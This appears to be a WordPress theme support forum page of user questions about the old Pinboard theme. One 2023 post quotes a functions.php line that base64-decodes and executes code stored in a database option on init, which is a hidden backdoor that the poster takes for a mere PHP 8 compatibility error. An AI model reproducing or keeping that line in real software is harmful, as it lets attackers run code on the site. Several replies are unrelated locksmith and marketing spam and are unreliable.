Skip to content
One Designs One Designs One Designs

Navigation Menu

  • Themes
  • Documentation
  • Plugins
  • Blog
  • Support
  • About
My Account
  • Log In

  • Register
  • Lost Password
Support Forums
  1. Home
  2. Support Forums
  3. Search
  4. Search Results for 'pinboard'

Search Results for 'pinboard'

Viewing 15 results - 1 through 15 (of 1,780 total)
  • 1
  • 2
  • 3
  • …
  • 117
  • 118
  • 119
  • →
  • May 30, 2025 at 5:43 pm #31625

    In reply to: Pinboard Compatability – WordPress 5.03


    Aliraza
    Participant

    24hr Locksmith Sheffield understands the importance of compatibility, just like Pinboard with WordPress 5.03. Keeping your security systems updated and compatible is essential for seamless performance and protection. Whether you need emergency lockout help or advanced lock upgrades, our round-the-clock services ensure your safety without delay. Trust our expert locksmiths for reliable, fast solutions in Sheffield. Stay secure with professionals who prioritize compatibility and efficiency every time.

    May 24, 2025 at 3:04 pm #30938

    In reply to: PinBoard: Support for PHP 8+


    Aliraza
    Participant

    Local locksmith services are your go-to solution for fast, reliable security assistance. Just like PinBoard’s support for PHP 8+ brings modern efficiency to web development, our expert locksmiths bring up-to-date tools and techniques to secure your home or business. From emergency lockouts to advanced security upgrades, we offer professional solutions tailored to your needs. Trust your local locksmith to deliver peace of mind with every call—prompt, precise, and always dependable.

    April 20, 2025 at 12:10 pm #29784

    Topic: Best substitute theme for Pinboard Theme


    Mike – Croydon
    Participant

    I understand that Onedesigns discontinued support for Pinboard back in 2015. It’s a shame because it was a good little theme.

    However, I’ve only just started having issues with later versions of WordPress for a site built in 2012.

    The Theme fails to create new posts. Can anybody provide a reason for this and a solution for this problem? or alternatively, suggest a more up to date theme (possibly a Onedesigns Theme) that I can replace Pinboard relatively seamlessly with by either uploading the new theme into the current site or by saving the current website and it’s content and parameters and importing them into a new clean WordPress site that is more up to date. Any advice would be helpful. Thanks in advance.

    • This topic was modified 2 months, 3 weeks ago by Mike - Croydon.
    December 31, 2024 at 4:29 am #26735

    In reply to: How to increase the width of content area i.e posts, pages and Home Page…


    shreytiwari009
    Participant

    Yes, it is possible to adjust the width of the content area in the Pinboard theme. You can modify the content width by editing the theme’s CSS or customizing settings through the WordPress customizer.

    Steps to Increase Content Width:
    Access the Theme Customizer: Go to the WordPress Dashboard, navigate to Appearance > Customize.

    Locate Additional CSS: In the Customizer, find the Additional CSS section.

    Modify the CSS: Add custom CSS code to adjust the content width. For example:

    .container {
    max-width: 1200px; /* Increase the value to widen */
    }
    .content-area {
    width: 75%; /* Adjust percentage to change content area width */
    }
    You can increase the value in the max-width or change the width percentage to achieve the desired width.

    Use Theme Options (if available): Some themes offer built-in options for adjusting layout widths directly through the theme settings under Appearance > Theme Options.

    Child Theme (Advanced): If you need more advanced changes, consider creating a child theme and overriding the relevant CSS files to prevent losing changes during updates.

    Increasing content width is a great way to enhance user experience and optimize content display. If you’re looking to refine your web skills, enrolling in a digital marketing certification course can further help you optimize your site for better performance and visibility.

    • This reply was modified 6 months, 1 week ago by shreytiwari009.
    • This reply was modified 6 months, 1 week ago by shreytiwari009.
    • This reply was modified 6 months, 1 week ago by shreytiwari009.
    April 25, 2023 at 3:03 pm #23981

    Topic: PinBoard: Support for PHP 8+


    Konzepttreu
    Participant

    Hello there 🙂

    I have a client who asked me to bring their website back up to date, including updating the outdated PHP version (actually on 7.4.33).
    Unfortunately, I got a lot of errors. After I switched off all plugins and this led to nothing, I asked the customer to send me the error message from the admin mail. Enclosed is the error message:

    Error-Details
    ==============
    An error of type E_ERROR was caused in line 2372 of file /var/www/vhosts/customer-domain/httpdocs/wp-content/themes/pinboard/functions.php

    Errormessage: Uncaught Error: Call to undefined function create_function() in /var/www/vhosts/customer-domain/httpdocs/wp-content/themes/pinboard/functions.php:2372
    Stack trace:
    #0 /var/www/vhosts/customer-path/httpdocs/wp-settings.php(585): include()
    #1 /var/www/vhosts/customer-path/httpdocs/wp-config.php(86): require_once(‘…’)
    #2 /var/www/vhosts/customer-path/httpdocs/wp-load.php(50): require_once(‘…’)
    #3 /var/www/vhosts/customer-path/httpdocs/wp-admin/admin.php(34): require_once(‘…’)
    #4 /var/www/vhosts/customer-path/httpdocs/wp-admin/index.php(10): require_once(‘…’)
    #5 {main}
    thrown

    So this refers to the theme. To be on the safe side, I deactivated the child theme and activated the main theme to test whether the child theme might contain incorrect entries.

    I found in the functions.php following code between 2365 an 2372:

    function pinboard_copyright_notice() {
    	$copyright = pinboard_get_option( 'copyright_notice' );
    	$copyright = str_replace( '%year%', date( 'Y' ), $copyright );
    	$copyright = str_replace( '%blogname%', get_bloginfo( 'name' ), $copyright );
    	echo esc_html( $copyright );
    }
    endif;
    add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ), 0 );

    As i can find in the internet, the create_function is no longer supported.
    Now, of course, I have seen that this theme is already very old. So here’s my question: Is it still going to be updated?

    November 11, 2021 at 11:06 am #23953

    Topic: Galley is limited on 25 posts?


    jutta
    Participant

    Hello,
    I’m using the theme Pinboard Version: 1.1.12

    I want to show all my posts on a page called Gallery. Can somebody tell me why it is limited? I have 32 post and only 25 appear on the page.

    Thanks for answering.

    Galerie

    August 5, 2021 at 5:43 pm #23934

    Topic: Pinboard theme broken ?


    Mr-Klucha
    Participant

    Is the Pinboard theme broken (display of edit page, edit section) since few days ? perhaps August 4th
    Or the problem is on my own ?

    Regards.

    • This topic was modified 3 years, 11 months ago by Mr-Klucha. Reason: "display" added
    November 14, 2020 at 3:49 pm #23248

    Topic: Issue with Slideshow Gallery plugin, not creating ::before or ::after selectors?


    kingtutu
    Participant

    Hi Daniel! Firstly, thanks for contributing to the WordPress community. I’ve been using the Pinboard theme for a while and absolutely love it – the front page slideshow is really great.

    I was wondering if you were able to help me diagnose/fix why Pinboard Theme v1.1.12 (on WordPress v5.5.3) has a little formatting error when trying to display a slideshow gallery (Slideshow Gallery v 1.6.15)? I’m happy to try and troubleshoot the code myself if you point me in the right direction. The specific error I have is the HTML produced when trying to embed a slideshow from the plugin is missing applying a “::before” and “::after” selector before the “Previous Image” and “Next Image” links of the Slideshow Gallery plugin. I can send a screenshot if that helps!

    Appreciate you’re super busy, but would appreciate any time you’re able to spare on this! Thanks

    August 28, 2020 at 2:51 pm #23245

    Topic: sidebar boxes with three columns


    jutta
    Participant

    Hello, I’m using the pinboard Version: 1.1.12. and although I’ve set the theme Options -> Layout sidebar boxes to 3 , it doesn’t display in three columns. What ca I do?

    Please check at http://tanzmueck.de/

    Thanks for an answer. :-))

    August 9, 2019 at 9:08 am #23190

    Topic: Category Menu too many items


    jjansen1609
    Participant

    I have a menu on my home page called Countries. It is a category menu of the countries I have written posts about. The problem is that I have too many countries and the menu items don’t appear to be able to scroll or anything on Windows. On Android I can see the entire menu list. In Windows my list of countries stops at Lithuania. Is there a fix to this. I am using Pinboard which I really like. On Windows the Countries dropdown stops at Lithuania. How do I see the entire list of categories from the menu item?
    As a work around, I thought that I might create a manual page that let the user select the country/category that they wanted to see. I can’t see how to insert categories into a page.
    Help Thanks.

    http://www.roadsaway.com

    January 30, 2019 at 4:13 pm #23155

    Topic: Pinboard Compatability – WordPress 5.03


    Mike – Croydon
    Participant

    Hi Guys,

    Some years ago I designed a website using Pinboard Theme and for the past couple of years it has been inactive.

    The Pinboard Theme version is Pinboard 1.1.12 and it is currently running on WordPress 4.4.17.

    I would like upgrade the site to the latest WordPress 5.03 but I’m unsure of it’s compatibility as I noticed that the theme has not been updated in a couple of years?

    I’d be grateful for some information on Pinboard’s compatibility with the latest version of WordPress and any problems that might be encountered before I upgrade WordPress.

    Also, any thoughts or advice on future compatibility with further WordPress updates going forward and whether now might be a good time to strip out the content of the site and rebuild it using another theme that continues to be supported?

    Many thanks in advance for your advice.

    Mike

    January 17, 2019 at 4:52 pm #23153

    Topic: Menu Inconsistency


    paulh
    Participant

    Hi and thanks for a great theme (Pinboard)

    I have a problem where I have an inconsistency in my Menu font. Some pages display the menu in italic and some pages display the menu in normal.

    Any ideas.

    Thanks

    • This topic was modified 6 years, 5 months ago by paulh.
    September 20, 2018 at 7:59 am #23140

    Topic: Looking for head-tag and body-section


    BroennumKom
    Participant

    Hi,

    I have Pinboard-theme and am looking in vain for:

    > head-tag in AMP HTML (purpose is to add AdWords script)
    > body-section of AMP HTML (purpose is to enter AdWords ad-code).

    Where do I find it (please guide for programming novice like me…)

    Thanx for your help!

    August 8, 2018 at 12:31 am #23129

    Topic: Image Header won’t show up on Chrome…


    idezign
    Participant

    I have a header issue on Pinboard theme. I’m trying to change the current image, but when I do it won’t change in customization mode nor when published. The weird thing is that the update shows up on Firefox, but not Chrome or Safari. Anyone know what the issue is. Very frustrating.

    April 23, 2018 at 6:02 pm #23110

    Topic: Remove Excerpt and … from Home Page layout


    shortybiscuit
    Participant

    Hi,

    I tried to do this by changing these to zero:

    function pinboard_excerpt_length( $length ) {
    	if( pinboard_is_teaser() ) {
    		if( has_post_format( 'aside' ) )
    			return 0;
    		else
    			return 0;
    	} else
    		return 0;

    And changing this to have a space:

    function pinboard_excerpt_more($more) {
    	return ' &# 160;';
    }
    endif;

    Is there a way to truly remove it? Maybe there should be an option to check a box?

Viewing 15 results - 1 through 15 (of 1,780 total)
  • 1
  • 2
  • 3
  • …
  • 117
  • 118
  • 119
  • →

Useful Information

About Us

We craft beautiful free WordPress themes with advanced functionality. Our themes are licenced under GPL and completely free, which means you can use them in any way you like, whether it’s powering up your website, giving your blog a new look, using it for some other project or modifying and redistributing them.

Never miss another release!

Subscribe to our newsletter and we'll keep you updated with new theme releases and recommendations.

Our Social Media Profiles

  • Facebook

    Like our Facebook page
  • Twitter

    Follow us on Twitter
  • WordPress.org

    Visit our WordPress.org Profile

Useful Links

  • Development Blog
  • Release Cycle
  • Site News
  • Support Policy
  • Contact Us
Copyright © 2009 - 2025 One Designs Created with passion, caffeine, WordPress and Enlightenment Framework